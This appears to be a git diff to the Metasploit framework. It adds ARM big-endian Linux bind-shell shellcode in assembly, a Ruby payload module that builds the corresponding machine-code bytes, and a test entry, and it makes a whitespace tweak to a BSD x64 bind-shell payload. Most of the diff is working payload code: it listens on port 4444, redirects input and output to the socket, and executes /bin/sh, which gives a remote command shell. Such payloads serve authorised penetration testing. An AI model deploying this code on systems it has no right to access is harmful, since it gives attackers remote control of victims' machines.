diff --git a/external/source/shellcode/linux/armbe/single_sock_bind.s b/external/source/shellcode/linux/armbe/single_sock_bind.s new file mode 100644 index 0000000000..dfcce490dc --- /dev/null +++ b/external/source/shellcode/linux/armbe/single_sock_bind.s @@ -0,0 +1,117 @@ +@@ +@ +@ Name: single_sock_bind +@ Qualities: - +@ Authors: Balazs Bucsay <@xoreipeip> +@ License: MSF_LICENSE +@ Description: +@ +@ Implementation of a Linux bind TCP shellcode for ARM BE architecture. +@ +@ Assemble with: +@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o +@ Link with: +@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode +@ +@ Meta-Information: +@ +@ meta-shortname=Linux Bind TCP +@ meta-description=Listen on a port for a connection and run a second stage +@ meta-authors=earthquake +@ meta-os=linux +@ meta-arch=armbe +@ meta-category=singles +@ meta-connection-type=bind +@ meta-name=bind_tcp +@@ + + +.section .text + .global _start + + _start: + .code 32 + +@ Thumb-Mode on + add r6, pc, #1 + bx r6 + .code 16 + +@ _socket(2,1,0) + sub r2, r2, r2 + add r1, r2, #1 + add r0, r2, #2 + lsl r7, r1, #8 + add r7, r7, #0x19 + svc 1 + mov r6, r0 + +@ 1 uint8_t sin_len +@ 1 sa_family_t sin_family +@ 2 in_port_t sin_port +@ 4 struct in_addr sin_addr +@ 8 char sin_zero [8] +@ 00 02 5C11 00000000 00000000 00000000 +@ 5c11 => 4444 +@ _bind() + mov r2, #2 + lsl r2, r2, #8 + add r2, r2, #0x11 + lsl r2, r2, #8 + add r2, r2, #0x5C + sub r3, r3, r3 + sub r4, r4, r4 + sub r5, r5, r5 + mov r1, sp + stm r1!, {r2-r5} + sub r1, #0x10 + mov r2, #16 + add r7, r7, #1 + svc 1 + +@ _listen() + mov r0, r6 + sub r1, r1, r1 + add r7, r7, #2 + svc 1 + +@ _accept() + mov r0, r6 + sub r2, r2, r2 + add r7, r7, #1 + svc 1 + mov r6, r0 + +@ _dup2() + sub r1, r1, r1 + mov r7, #63 + svc 1 + + mov r0, r6 + add r1, r1, #1 + svc 1 + + mov r0, r6 + add r1, r1, #1 + svc 1 + + _execve() + sub r2, r2, r2 + mov r0, pc + add r0, #18 +@ next intstruction terminates the string beneath the code "//bin/sh" +@ in case you want to say goodbye to the null character +@ str r2, [r0, #8] + str r2, [sp, #8] + str r0, [sp, #4] + add r1, sp, #4 + mov r7, #11 + svc 1 + +@ _exit() + sub r4, r4, r4 + mov r0, r4 + mov r7, #1 + svc 1 +.ascii "//bin/sh\0" +@.ascii "//bin/sh" diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index 8bff2170e3..d0076c8bbd 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -44,7 +44,7 @@ module MetasploitModule "\x0f\x05" +# syscall # "\x48\x97" +# xchg %rax,%rdi # "\x52" +# push %rdx # - "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 # + "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 # "\x52" +# push %rdx # "\x48\x89\xe6" +# mov %rsp,%rsi # "\x6a\x10" +# pushq $0x10 # diff --git a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb new file mode 100644 index 0000000000..725d77eff9 --- /dev/null +++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb @@ -0,0 +1,115 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit4 + + CachedSize = 118 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline', + 'Description' => 'Listen for a connection and spawn a command shell', + 'Author' => 'Balazs Bucsay @xoreipeip ', + 'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s'], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShellUnix + )) + # Register command execution options + register_options( + [ + OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]), + Opt::LPORT(4444) + ], self.class) + end + def generate + cmd = (datastore['CMD'] || '') + "\x00" + bytehigh = (datastore['LPORT'].to_i >> 8).chr + bytelow = (datastore['LPORT'].to_i & 0xFF).chr + + payload = + # turning on thumb mode + "\xe2\x8f\x60\x01" +# add r6, pc, #1 # + "\xe1\x2f\xff\x16" +# bx r6 # + + # thumb mode on + # socket(2,1,0) + "\x1a\x92" +# sub r2, r2, r2 # + "\x1c\x51" +# add r1, r2, #1 # + "\x1c\x90" +# add r0, r2, #2 # + "\x02\x0f" +# lsl r7, r1, #8 # + "\x37\x19" +# add r7, r7, #0x19 # + "\xdf\x01" +# svc 1 # + "\x1c\x06" +# mov r6, r0 # + + # bind() + "\x22\x02" +# mov r2, #2 # + "\x02\x12" +# lsl r2, r2, #8 # + "\x32"+bytehigh +# add r2, r2, #0xXX # + "\x02\x12" +# lsl r2, r2, #8 # + "\x32"+bytelow +# add r2, r2, #0xXX # + "\x1a\xdb" +# sub r3, r3, r3 # + "\x1b\x24" +# sub r4, r4, r4 # + "\x1b\x6d" +# sub r5, r5, r5 # + "\x46\x69" +# mov r1, sp # + "\xc1\x3c" +# stm r1!, {r2-r5} # + "\x39\x10" +# sub r1, #0x10 # + "\x22\x10" +# mov r2, #16 # + "\x37\x01" +# add r7, r7, #1 # + "\xdf\x01" +# svc 1 # + + # listen() + "\x1c\x30" +# mov r0, r6 # + "\x1a\x49" +# sub r1, r1, r1 # + "\x37\x02" +# add r7, r7, #2 # + "\xdf\x01" +# svc 1 # + + # accept() + "\x1c\x30" +# mov r0, r6 # + "\x1a\x92" +# sub r2, r2, r2 # + "\x37\x01" +# add r7, r7, #1 # + "\xdf\x01" +# svc 1 # + "\x1c\x06" +# mov r6, r0 # + + # dup2() + "\x1a\x49" +# sub r1, r1, r1 # + "\x27\x3f" +# mov r7, #63 # + "\xdf\x01" +# svc 1 # + "\x1c\x30" +# mov r0, r6 # + "\x31\x01" +# add r1, r1, #1 # + "\xdf\x01" +# svc 1 # + "\x1c\x30" +# mov r0, r6 # + "\x31\x01" +# add r1, r1, #1 # + "\xdf\x01" +# svc 1 # + + # execve() + "\x1a\x92" +# sub r2, r2, r2 # + "\x46\x78" +# mov r0, pc # + "\x30\x12" +# add r0, #18 # + "\x92\x02" +# str r2, [sp, #8] # + "\x90\x01" +# str r0, [sp, #4] # + "\xa9\x01" +# add r1, sp, #4 # + "\x27\x0b" +# mov r7, #11 # + "\xdf\x01" +# svc 1 # + + # exit() + "\x1b\x24" +# sub r4, r4, r4 # + "\x1c\x20" +# mov r0, r4 # + "\x27\x01" +# mov r7, #1 # + "\xdf\x01" +# svc 1 # + cmd + end +end diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 633b712c59..d0bba13437 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1053,6 +1053,16 @@ RSpec.describe 'modules/payloads', :content do modules_pathname: modules_pathname, reference_name: 'java/shell_reverse_tcp' end + + context 'linux/armbe/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/shell_bind_tcp' + end context 'linux/armle/adduser' do it_should_behave_like 'payload cached size is consistent',